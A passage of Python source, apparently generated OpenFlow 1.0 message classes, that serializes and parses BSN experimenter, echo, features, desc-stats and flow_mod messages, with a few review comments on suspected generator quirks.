        orig_reader = reader
        # Restrict parsing to this message's declared length.
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        _stats_type = reader.read("!H")[0]
        assert(_stats_type == 65535)
        obj.flags = reader.read("!H")[0]
        reader.skip(4)
        _experimenter = reader.read("!L")[0]
        assert(_experimenter == 6035143)
        obj.subtype = reader.read("!L")[0]
        return obj
    def __eq__(self, other):
        # Field-by-field equality; type must match exactly.
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.flags != other.flags: return False
        if self.subtype != other.subtype: return False
        return True
    def pretty_print(self, q):
        """Render fields through formatter *q*."""
        q.text("bsn_stats_reply {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("flags = ");
                q.text("%#x" % self.flags)
                q.breakable()
                q.text('}')
# Register under the BSN experimenter ID.
experimenter_stats_reply.subtypes[6035143] = bsn_stats_reply
class experimenter_stats_request(stats_request):
    """Generic experimenter (vendor) stats request (OpenFlow 1.0).

    ``subtypes`` maps experimenter IDs to more specific subclasses; unpack()
    dispatches through it before falling back to this generic form.
    NOTE(review): pretty_print omits the ``experimenter`` field -- generator
    artifact, kept as-is.
    """
    subtypes = {}
    version = 1
    type = 16
    stats_type = 65535
    def __init__(self, xid=None, flags=None, experimenter=None, data=None):
        # Fields default to their wire-format zero/empty values when omitted.
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        if flags != None:
            self.flags = flags
        else:
            self.flags = 0
        if experimenter != None:
            self.experimenter = experimenter
        else:
            self.experimenter = 0
        if data != None:
            self.data = data
        else:
            self.data = ''
        return
    def pack(self):
        """Serialize this message; returns the packed wire-format string."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!H", self.stats_type))
        packed.append(struct.pack("!H", self.flags))
        packed.append(struct.pack("!L", self.experimenter))
        packed.append(self.data)
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)
    @staticmethod
    def unpack(reader):
        """Deserialize from *reader*, dispatching on the experimenter ID."""
        # Peek the experimenter ID at byte offset 12 without consuming it.
        subtype, = reader.peek('!L', 12)
        subclass = experimenter_stats_request.subtypes.get(subtype)
        if subclass:
            return subclass.unpack(reader)
        obj = experimenter_stats_request()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 16)
        _length = reader.read("!H")[0]
        orig_reader = reader
        # Restrict parsing to this message's declared length.
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        _stats_type = reader.read("!H")[0]
        assert(_stats_type == 65535)
        obj.flags = reader.read("!H")[0]
        obj.experimenter = reader.read("!L")[0]
        obj.data = str(reader.read_all())
        return obj
    def __eq__(self, other):
        # Field-by-field equality; type must match exactly.
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.flags != other.flags: return False
        if self.experimenter != other.experimenter: return False
        if self.data != other.data: return False
        return True
    def pretty_print(self, q):
        """Render fields through formatter *q*."""
        q.text("experimenter_stats_request {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("flags = ");
                q.text("%#x" % self.flags)
                q.text(","); q.breakable()
                q.text("data = ");
                q.pp(self.data)
                q.breakable()
                q.text('}')
# Register as the generic handler for experimenter (0xffff) stats requests.
stats_request.subtypes[65535] = experimenter_stats_request
class bsn_stats_request(experimenter_stats_request):
    """BSN experimenter stats request base class.

    ``subtypes`` maps BSN stats subtypes to concrete request classes;
    unpack() dispatches through it first.
    NOTE(review): ``type = 18`` here vs. 16 on the parent -- value comes from
    the generator's input definitions; verify against the protocol spec.
    """
    subtypes = {}
    version = 1
    type = 18
    stats_type = 65535
    experimenter = 6035143
    def __init__(self, xid=None, flags=None, subtype=None):
        # Fields default to their wire-format zero values when omitted.
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        if flags != None:
            self.flags = flags
        else:
            self.flags = 0
        if subtype != None:
            self.subtype = subtype
        else:
            self.subtype = 0
        return
    def pack(self):
        """Serialize this message; returns the packed wire-format string."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!H", self.stats_type))
        packed.append(struct.pack("!H", self.flags))
        # 4 pad bytes before the experimenter header.
        packed.append('\x00' * 4)
        packed.append(struct.pack("!L", self.experimenter))
        packed.append(struct.pack("!L", self.subtype))
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)
    @staticmethod
    def unpack(reader):
        """Deserialize from *reader*, dispatching on the BSN stats subtype."""
        # Peek the subtype at byte offset 20 without consuming it.
        subtype, = reader.peek('!L', 20)
        subclass = bsn_stats_request.subtypes.get(subtype)
        if subclass:
            return subclass.unpack(reader)
        obj = bsn_stats_request()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 18)
        _length = reader.read("!H")[0]
        orig_reader = reader
        # Restrict parsing to this message's declared length.
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        _stats_type = reader.read("!H")[0]
        assert(_stats_type == 65535)
        obj.flags = reader.read("!H")[0]
        reader.skip(4)
        _experimenter = reader.read("!L")[0]
        assert(_experimenter == 6035143)
        obj.subtype = reader.read("!L")[0]
        return obj
    def __eq__(self, other):
        # Field-by-field equality; type must match exactly.
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.flags != other.flags: return False
        if self.subtype != other.subtype: return False
        return True
    def pretty_print(self, q):
        """Render fields through formatter *q*."""
        q.text("bsn_stats_request {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("flags = ");
                q.text("%#x" % self.flags)
                q.breakable()
                q.text('}')
# Register under the BSN experimenter ID.
experimenter_stats_request.subtypes[6035143] = bsn_stats_request
class bsn_virtual_port_create_reply(bsn_header):
    """BSN virtual-port create reply (OpenFlow 1.0 experimenter, subtype 16).

    Reports ``status`` of the create request and the assigned ``vport_no``.
    NOTE(review): auto-generated wire codec -- pack()/unpack() statement
    order is the on-wire byte layout; do not reorder.
    """
    version = 1
    type = 4
    experimenter = 6035143
    subtype = 16
    def __init__(self, xid=None, status=None, vport_no=None):
        # Fields default to their wire-format zero values when omitted.
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        if status != None:
            self.status = status
        else:
            self.status = 0
        if vport_no != None:
            self.vport_no = vport_no
        else:
            self.vport_no = 0
        return
    def pack(self):
        """Serialize this message; returns the packed wire-format string."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!L", self.experimenter))
        packed.append(struct.pack("!L", self.subtype))
        packed.append(struct.pack("!L", self.status))
        packed.append(struct.pack("!L", self.vport_no))
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)
    @staticmethod
    def unpack(reader):
        """Deserialize from *reader*; asserts fixed header fields match."""
        obj = bsn_virtual_port_create_reply()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 4)
        _length = reader.read("!H")[0]
        orig_reader = reader
        # Restrict parsing to this message's declared length.
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        _experimenter = reader.read("!L")[0]
        assert(_experimenter == 6035143)
        _subtype = reader.read("!L")[0]
        assert(_subtype == 16)
        obj.status = reader.read("!L")[0]
        obj.vport_no = reader.read("!L")[0]
        return obj
    def __eq__(self, other):
        # Field-by-field equality; type must match exactly.
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.status != other.status: return False
        if self.vport_no != other.vport_no: return False
        return True
    def pretty_print(self, q):
        """Render all fields through formatter *q*."""
        q.text("bsn_virtual_port_create_reply {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("status = ");
                q.text("%#x" % self.status)
                q.text(","); q.breakable()
                q.text("vport_no = ");
                q.text("%#x" % self.vport_no)
                q.breakable()
                q.text('}')
# Register in the BSN experimenter dispatch table.
bsn_header.subtypes[16] = bsn_virtual_port_create_reply
class bsn_virtual_port_create_request(bsn_header):
    """BSN virtual-port create request (OpenFlow 1.0 experimenter, subtype 15).

    Carries a ``vport`` descriptor (an ``ofp.bsn_vport`` sub-object) that is
    packed/unpacked via that object's own codec.
    NOTE(review): auto-generated wire codec -- pack()/unpack() statement
    order is the on-wire byte layout; do not reorder.
    """
    version = 1
    type = 4
    experimenter = 6035143
    subtype = 15
    def __init__(self, xid=None, vport=None):
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        if vport != None:
            self.vport = vport
        else:
            # Default to an empty vport descriptor.
            self.vport = ofp.bsn_vport()
        return
    def pack(self):
        """Serialize this message; returns the packed wire-format string."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!L", self.experimenter))
        packed.append(struct.pack("!L", self.subtype))
        packed.append(self.vport.pack())
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)
    @staticmethod
    def unpack(reader):
        """Deserialize from *reader*; asserts fixed header fields match."""
        obj = bsn_virtual_port_create_request()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 4)
        _length = reader.read("!H")[0]
        orig_reader = reader
        # Restrict parsing to this message's declared length.
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        _experimenter = reader.read("!L")[0]
        assert(_experimenter == 6035143)
        _subtype = reader.read("!L")[0]
        assert(_subtype == 15)
        obj.vport = ofp.bsn_vport.unpack(reader)
        return obj
    def __eq__(self, other):
        # Field-by-field equality; type must match exactly.
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.vport != other.vport: return False
        return True
    def pretty_print(self, q):
        """Render all fields through formatter *q*."""
        q.text("bsn_virtual_port_create_request {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
                q.text(","); q.breakable()
                q.text("vport = ");
                q.pp(self.vport)
                q.breakable()
                q.text('}')
# Register in the BSN experimenter dispatch table.
bsn_header.subtypes[15] = bsn_virtual_port_create_request
class bsn_virtual_port_remove_reply(bsn_header):
    """BSN experimenter reply for a virtual-port removal (subtype 26).

    Wire version 1.  Carries a 32-bit status code.
    """
    version = 1
    type = 4
    experimenter = 6035143
    subtype = 26

    def __init__(self, xid=None, status=None):
        self.xid = xid
        self.status = status if status is not None else 0

    def pack(self):
        # Serialize all fields, then back-patch the length at index 2.
        parts = [
            struct.pack("!B", self.version),
            struct.pack("!B", self.type),
            struct.pack("!H", 0),  # length placeholder
            struct.pack("!L", self.xid),
            struct.pack("!L", self.experimenter),
            struct.pack("!L", self.subtype),
            struct.pack("!L", self.status),
        ]
        parts[2] = struct.pack("!H", sum(len(p) for p in parts))
        return ''.join(parts)

    @staticmethod
    def unpack(reader):
        msg = bsn_virtual_port_remove_reply()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 4)
        _length = reader.read("!H")[0]
        # Restrict all further reads to this message's declared length.
        reader = reader.slice(_length, 4)
        msg.xid = reader.read("!L")[0]
        _experimenter = reader.read("!L")[0]
        assert(_experimenter == 6035143)
        _subtype = reader.read("!L")[0]
        assert(_subtype == 26)
        msg.status = reader.read("!L")[0]
        return msg

    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.status != other.status: return False
        return True

    def pretty_print(self, q):
        q.text("bsn_virtual_port_remove_reply {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ")
                q.text("%#x" % self.xid if self.xid is not None else 'None')
                q.text(","); q.breakable(); q.text("status = "); q.text("%#x" % self.status)
                q.breakable()
        q.text('}')

bsn_header.subtypes[26] = bsn_virtual_port_remove_reply
class bsn_virtual_port_remove_request(bsn_header):
    """BSN experimenter message requesting removal of virtual port ``vport_no``.

    Wire version 1; experimenter subtype 17.
    """
    version = 1
    type = 4
    experimenter = 6035143
    subtype = 17

    def __init__(self, xid=None, vport_no=None):
        self.xid = xid
        self.vport_no = vport_no if vport_no is not None else 0

    def pack(self):
        # Serialize all fields, then back-patch the length at index 2.
        parts = [
            struct.pack("!B", self.version),
            struct.pack("!B", self.type),
            struct.pack("!H", 0),  # length placeholder
            struct.pack("!L", self.xid),
            struct.pack("!L", self.experimenter),
            struct.pack("!L", self.subtype),
            struct.pack("!L", self.vport_no),
        ]
        parts[2] = struct.pack("!H", sum(len(p) for p in parts))
        return ''.join(parts)

    @staticmethod
    def unpack(reader):
        msg = bsn_virtual_port_remove_request()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 4)
        _length = reader.read("!H")[0]
        # Restrict all further reads to this message's declared length.
        reader = reader.slice(_length, 4)
        msg.xid = reader.read("!L")[0]
        _experimenter = reader.read("!L")[0]
        assert(_experimenter == 6035143)
        _subtype = reader.read("!L")[0]
        assert(_subtype == 17)
        msg.vport_no = reader.read("!L")[0]
        return msg

    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.vport_no != other.vport_no: return False
        return True

    def pretty_print(self, q):
        q.text("bsn_virtual_port_remove_request {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ")
                q.text("%#x" % self.xid if self.xid is not None else 'None')
                q.text(","); q.breakable(); q.text("vport_no = "); q.text("%#x" % self.vport_no)
                q.breakable()
        q.text('}')

bsn_header.subtypes[17] = bsn_virtual_port_remove_request
class desc_stats_reply(stats_reply):
    """OFPST_DESC stats reply (wire version 1).

    Carries fixed-width, NUL-padded description strings for the datapath:
    manufacturer, hardware, software, serial number, and datapath description.
    """
    version = 1
    type = 17
    stats_type = 0

    def __init__(self, xid=None, flags=None, mfr_desc=None, hw_desc=None,
                 sw_desc=None, serial_num=None, dp_desc=None):
        self.xid = xid
        self.flags = flags if flags is not None else 0
        self.mfr_desc = mfr_desc if mfr_desc is not None else ""
        self.hw_desc = hw_desc if hw_desc is not None else ""
        self.sw_desc = sw_desc if sw_desc is not None else ""
        self.serial_num = serial_num if serial_num is not None else ""
        self.dp_desc = dp_desc if dp_desc is not None else ""

    def pack(self):
        # Fixed-width string fields are zero-padded by struct's "Ns" codes.
        parts = [
            struct.pack("!B", self.version),
            struct.pack("!B", self.type),
            struct.pack("!H", 0),  # length placeholder, patched below
            struct.pack("!L", self.xid),
            struct.pack("!H", self.stats_type),
            struct.pack("!H", self.flags),
            struct.pack("!256s", self.mfr_desc),
            struct.pack("!256s", self.hw_desc),
            struct.pack("!256s", self.sw_desc),
            struct.pack("!32s", self.serial_num),
            struct.pack("!256s", self.dp_desc),
        ]
        parts[2] = struct.pack("!H", sum(len(p) for p in parts))
        return ''.join(parts)

    @staticmethod
    def unpack(reader):
        msg = desc_stats_reply()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 17)
        _length = reader.read("!H")[0]
        # Restrict all further reads to this message's declared length.
        reader = reader.slice(_length, 4)
        msg.xid = reader.read("!L")[0]
        _stats_type = reader.read("!H")[0]
        assert(_stats_type == 0)
        msg.flags = reader.read("!H")[0]
        # Strip the NUL padding that the fixed-width wire encoding adds.
        msg.mfr_desc = reader.read("!256s")[0].rstrip("\x00")
        msg.hw_desc = reader.read("!256s")[0].rstrip("\x00")
        msg.sw_desc = reader.read("!256s")[0].rstrip("\x00")
        msg.serial_num = reader.read("!32s")[0].rstrip("\x00")
        msg.dp_desc = reader.read("!256s")[0].rstrip("\x00")
        return msg

    def __eq__(self, other):
        if type(self) != type(other): return False
        for attr in ("xid", "flags", "mfr_desc", "hw_desc", "sw_desc",
                     "serial_num", "dp_desc"):
            if getattr(self, attr) != getattr(other, attr): return False
        return True

    def pretty_print(self, q):
        q.text("desc_stats_reply {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ")
                q.text("%#x" % self.xid if self.xid is not None else 'None')
                q.text(","); q.breakable(); q.text("flags = "); q.text("%#x" % self.flags)
                q.text(","); q.breakable(); q.text("mfr_desc = "); q.pp(self.mfr_desc)
                q.text(","); q.breakable(); q.text("hw_desc = "); q.pp(self.hw_desc)
                q.text(","); q.breakable(); q.text("sw_desc = "); q.pp(self.sw_desc)
                q.text(","); q.breakable(); q.text("serial_num = "); q.pp(self.serial_num)
                q.text(","); q.breakable(); q.text("dp_desc = "); q.pp(self.dp_desc)
                q.breakable()
        q.text('}')

stats_reply.subtypes[0] = desc_stats_reply
class desc_stats_request(stats_request):
    """OFPST_DESC stats request (wire version 1).

    Header-only request; the only variable field besides xid is ``flags``.
    """
    version = 1
    type = 16
    stats_type = 0

    def __init__(self, xid=None, flags=None):
        self.xid = xid
        self.flags = flags if flags is not None else 0

    def pack(self):
        parts = [
            struct.pack("!B", self.version),
            struct.pack("!B", self.type),
            struct.pack("!H", 0),  # length placeholder, patched below
            struct.pack("!L", self.xid),
            struct.pack("!H", self.stats_type),
            struct.pack("!H", self.flags),
        ]
        parts[2] = struct.pack("!H", sum(len(p) for p in parts))
        return ''.join(parts)

    @staticmethod
    def unpack(reader):
        msg = desc_stats_request()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 16)
        _length = reader.read("!H")[0]
        # Restrict all further reads to this message's declared length.
        reader = reader.slice(_length, 4)
        msg.xid = reader.read("!L")[0]
        _stats_type = reader.read("!H")[0]
        assert(_stats_type == 0)
        msg.flags = reader.read("!H")[0]
        return msg

    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.flags != other.flags: return False
        return True

    def pretty_print(self, q):
        q.text("desc_stats_request {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ")
                q.text("%#x" % self.xid if self.xid is not None else 'None')
                q.text(","); q.breakable(); q.text("flags = "); q.text("%#x" % self.flags)
                q.breakable()
        q.text('}')

stats_request.subtypes[0] = desc_stats_request
class echo_reply(message):
    """OFPT_ECHO_REPLY (wire version 1).

    Echoes back arbitrary opaque ``data`` following the standard header.
    """
    version = 1
    type = 3

    def __init__(self, xid=None, data=None):
        self.xid = xid
        self.data = data if data is not None else ''

    def pack(self):
        parts = [
            struct.pack("!B", self.version),
            struct.pack("!B", self.type),
            struct.pack("!H", 0),  # length placeholder, patched below
            struct.pack("!L", self.xid),
            self.data,  # raw payload, appended verbatim
        ]
        parts[2] = struct.pack("!H", sum(len(p) for p in parts))
        return ''.join(parts)

    @staticmethod
    def unpack(reader):
        msg = echo_reply()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 3)
        _length = reader.read("!H")[0]
        # Restrict all further reads to this message's declared length.
        reader = reader.slice(_length, 4)
        msg.xid = reader.read("!L")[0]
        # Everything remaining in the slice is the opaque echo payload.
        msg.data = str(reader.read_all())
        return msg

    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.data != other.data: return False
        return True

    def pretty_print(self, q):
        q.text("echo_reply {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ")
                q.text("%#x" % self.xid if self.xid is not None else 'None')
                q.text(","); q.breakable(); q.text("data = "); q.pp(self.data)
                q.breakable()
        q.text('}')

message.subtypes[3] = echo_reply
class echo_request(message):
    """OFPT_ECHO_REQUEST (wire version 1).

    Carries arbitrary opaque ``data`` which the peer must echo back.
    """
    version = 1
    type = 2

    def __init__(self, xid=None, data=None):
        self.xid = xid
        self.data = data if data is not None else ''

    def pack(self):
        parts = [
            struct.pack("!B", self.version),
            struct.pack("!B", self.type),
            struct.pack("!H", 0),  # length placeholder, patched below
            struct.pack("!L", self.xid),
            self.data,  # raw payload, appended verbatim
        ]
        parts[2] = struct.pack("!H", sum(len(p) for p in parts))
        return ''.join(parts)

    @staticmethod
    def unpack(reader):
        msg = echo_request()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 2)
        _length = reader.read("!H")[0]
        # Restrict all further reads to this message's declared length.
        reader = reader.slice(_length, 4)
        msg.xid = reader.read("!L")[0]
        # Everything remaining in the slice is the opaque echo payload.
        msg.data = str(reader.read_all())
        return msg

    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.data != other.data: return False
        return True

    def pretty_print(self, q):
        q.text("echo_request {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ")
                q.text("%#x" % self.xid if self.xid is not None else 'None')
                q.text(","); q.breakable(); q.text("data = "); q.pp(self.data)
                q.breakable()
        q.text('}')

message.subtypes[2] = echo_request
class features_reply(message):
    """OFPT_FEATURES_REPLY (wire version 1).

    Describes the datapath: id, buffer/table counts, capability and action
    bitmaps, and the list of physical port descriptions.
    """
    version = 1
    type = 6

    def __init__(self, xid=None, datapath_id=None, n_buffers=None,
                 n_tables=None, capabilities=None, actions=None, ports=None):
        self.xid = xid
        self.datapath_id = datapath_id if datapath_id is not None else 0
        self.n_buffers = n_buffers if n_buffers is not None else 0
        self.n_tables = n_tables if n_tables is not None else 0
        self.capabilities = capabilities if capabilities is not None else 0
        self.actions = actions if actions is not None else 0
        self.ports = ports if ports is not None else []

    def pack(self):
        parts = [
            struct.pack("!B", self.version),
            struct.pack("!B", self.type),
            struct.pack("!H", 0),  # length placeholder, patched below
            struct.pack("!L", self.xid),
            struct.pack("!Q", self.datapath_id),
            struct.pack("!L", self.n_buffers),
            struct.pack("!B", self.n_tables),
            '\x00' * 3,  # pad to 4-byte alignment
            struct.pack("!L", self.capabilities),
            struct.pack("!L", self.actions),
            loxi.generic_util.pack_list(self.ports),
        ]
        parts[2] = struct.pack("!H", sum(len(p) for p in parts))
        return ''.join(parts)

    @staticmethod
    def unpack(reader):
        msg = features_reply()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 6)
        _length = reader.read("!H")[0]
        # Restrict all further reads to this message's declared length.
        reader = reader.slice(_length, 4)
        msg.xid = reader.read("!L")[0]
        msg.datapath_id = reader.read("!Q")[0]
        msg.n_buffers = reader.read("!L")[0]
        msg.n_tables = reader.read("!B")[0]
        reader.skip(3)  # alignment padding
        msg.capabilities = reader.read("!L")[0]
        msg.actions = reader.read("!L")[0]
        # Remaining bytes are a list of port descriptions.
        msg.ports = loxi.generic_util.unpack_list(reader, ofp.common.port_desc.unpack)
        return msg

    def __eq__(self, other):
        if type(self) != type(other): return False
        for attr in ("xid", "datapath_id", "n_buffers", "n_tables",
                     "capabilities", "actions", "ports"):
            if getattr(self, attr) != getattr(other, attr): return False
        return True

    def pretty_print(self, q):
        q.text("features_reply {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ")
                q.text("%#x" % self.xid if self.xid is not None else 'None')
                q.text(","); q.breakable(); q.text("datapath_id = "); q.text("%#x" % self.datapath_id)
                q.text(","); q.breakable(); q.text("n_buffers = "); q.text("%#x" % self.n_buffers)
                q.text(","); q.breakable(); q.text("n_tables = "); q.text("%#x" % self.n_tables)
                q.text(","); q.breakable(); q.text("capabilities = "); q.text("%#x" % self.capabilities)
                q.text(","); q.breakable(); q.text("actions = "); q.text("%#x" % self.actions)
                q.text(","); q.breakable(); q.text("ports = "); q.pp(self.ports)
                q.breakable()
        q.text('}')

message.subtypes[6] = features_reply
class features_request(message):
    """OFPT_FEATURES_REQUEST (wire version 1).

    Header-only message; the only field is the transaction id.
    """
    version = 1
    type = 5

    def __init__(self, xid=None):
        self.xid = xid

    def pack(self):
        parts = [
            struct.pack("!B", self.version),
            struct.pack("!B", self.type),
            struct.pack("!H", 0),  # length placeholder, patched below
            struct.pack("!L", self.xid),
        ]
        parts[2] = struct.pack("!H", sum(len(p) for p in parts))
        return ''.join(parts)

    @staticmethod
    def unpack(reader):
        msg = features_request()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 5)
        _length = reader.read("!H")[0]
        # Restrict all further reads to this message's declared length.
        reader = reader.slice(_length, 4)
        msg.xid = reader.read("!L")[0]
        return msg

    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        return True

    def pretty_print(self, q):
        q.text("features_request {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ")
                q.text("%#x" % self.xid if self.xid is not None else 'None')
                q.breakable()
        q.text('}')

message.subtypes[5] = features_request
class flow_mod(message):
    """OFPT_FLOW_MOD (wire version 1) base class.

    Concrete command variants (add/modify/delete/...) register themselves in
    ``subtypes`` keyed by the flow-mod command; ``unpack`` dispatches on the
    command field peeked at byte offset 56.
    """
    subtypes = {}

    version = 1
    type = 14

    def __init__(self, xid=None, match=None, cookie=None, _command=None,
                 idle_timeout=None, hard_timeout=None, priority=None,
                 buffer_id=None, out_port=None, flags=None, actions=None):
        self.xid = xid
        self.match = match if match is not None else ofp.match()
        self.cookie = cookie if cookie is not None else 0
        self._command = _command if _command is not None else 0
        self.idle_timeout = idle_timeout if idle_timeout is not None else 0
        self.hard_timeout = hard_timeout if hard_timeout is not None else 0
        self.priority = priority if priority is not None else 0
        self.buffer_id = buffer_id if buffer_id is not None else 0
        self.out_port = out_port if out_port is not None else 0
        self.flags = flags if flags is not None else 0
        self.actions = actions if actions is not None else []

    def pack(self):
        parts = [
            struct.pack("!B", self.version),
            struct.pack("!B", self.type),
            struct.pack("!H", 0),  # length placeholder, patched below
            struct.pack("!L", self.xid),
            self.match.pack(),
            struct.pack("!Q", self.cookie),
            util.pack_fm_cmd(self._command),
            struct.pack("!H", self.idle_timeout),
            struct.pack("!H", self.hard_timeout),
            struct.pack("!H", self.priority),
            struct.pack("!L", self.buffer_id),
            util.pack_port_no(self.out_port),
            struct.pack("!H", self.flags),
            loxi.generic_util.pack_list(self.actions),
        ]
        parts[2] = struct.pack("!H", sum(len(p) for p in parts))
        return ''.join(parts)

    @staticmethod
    def unpack(reader):
        # Peek the command field and dispatch to the registered subclass,
        # if any; otherwise decode as a generic flow_mod.
        subtype, = reader.peek('!H', 56)
        subclass = flow_mod.subtypes.get(subtype)
        if subclass:
            return subclass.unpack(reader)
        msg = flow_mod()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 14)
        _length = reader.read("!H")[0]
        # Restrict all further reads to this message's declared length.
        reader = reader.slice(_length, 4)
        msg.xid = reader.read("!L")[0]
        msg.match = ofp.match.unpack(reader)
        msg.cookie = reader.read("!Q")[0]
        msg._command = util.unpack_fm_cmd(reader)
        msg.idle_timeout = reader.read("!H")[0]
        msg.hard_timeout = reader.read("!H")[0]
        msg.priority = reader.read("!H")[0]
        msg.buffer_id = reader.read("!L")[0]
        msg.out_port = util.unpack_port_no(reader)
        msg.flags = reader.read("!H")[0]
        msg.actions = loxi.generic_util.unpack_list(reader, ofp.action.action.unpack)
        return msg

    def __eq__(self, other):
        if type(self) != type(other): return False
        for attr in ("xid", "match", "cookie", "_command", "idle_timeout",
                     "hard_timeout", "priority", "buffer_id", "out_port",
                     "flags", "actions"):
            if getattr(self, attr) != getattr(other, attr): return False
        return True

    def pretty_print(self, q):
        q.text("flow_mod {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ")
                q.text("%#x" % self.xid if self.xid is not None else 'None')
                q.text(","); q.breakable(); q.text("match = "); q.pp(self.match)
                q.text(","); q.breakable(); q.text("cookie = "); q.text("%#x" % self.cookie)
                q.text(","); q.breakable(); q.text("idle_timeout = "); q.text("%#x" % self.idle_timeout)
                q.text(","); q.breakable(); q.text("hard_timeout = "); q.text("%#x" % self.hard_timeout)
                q.text(","); q.breakable(); q.text("priority = "); q.text("%#x" % self.priority)
                q.text(","); q.breakable(); q.text("buffer_id = "); q.text("%#x" % self.buffer_id)
                q.text(","); q.breakable(); q.text("out_port = "); q.text(util.pretty_port(self.out_port))
                q.text(","); q.breakable(); q.text("flags = "); q.text("%#x" % self.flags)
                q.text(","); q.breakable(); q.text("actions = "); q.pp(self.actions)
                q.breakable()
        q.text('}')

message.subtypes[14] = flow_mod
class flow_add(flow_mod):
    """flow_mod with command 0 (add) — wire version 1."""
    version = 1
    type = 14
    _command = 0

    def __init__(self, xid=None, match=None, cookie=None, idle_timeout=None,
                 hard_timeout=None, priority=None, buffer_id=None,
                 out_port=None, flags=None, actions=None):
        self.xid = xid
        self.match = match if match is not None else ofp.match()
        self.cookie = cookie if cookie is not None else 0
        self.idle_timeout = idle_timeout if idle_timeout is not None else 0
        self.hard_timeout = hard_timeout if hard_timeout is not None else 0
        self.priority = priority if priority is not None else 0
        self.buffer_id = buffer_id if buffer_id is not None else 0
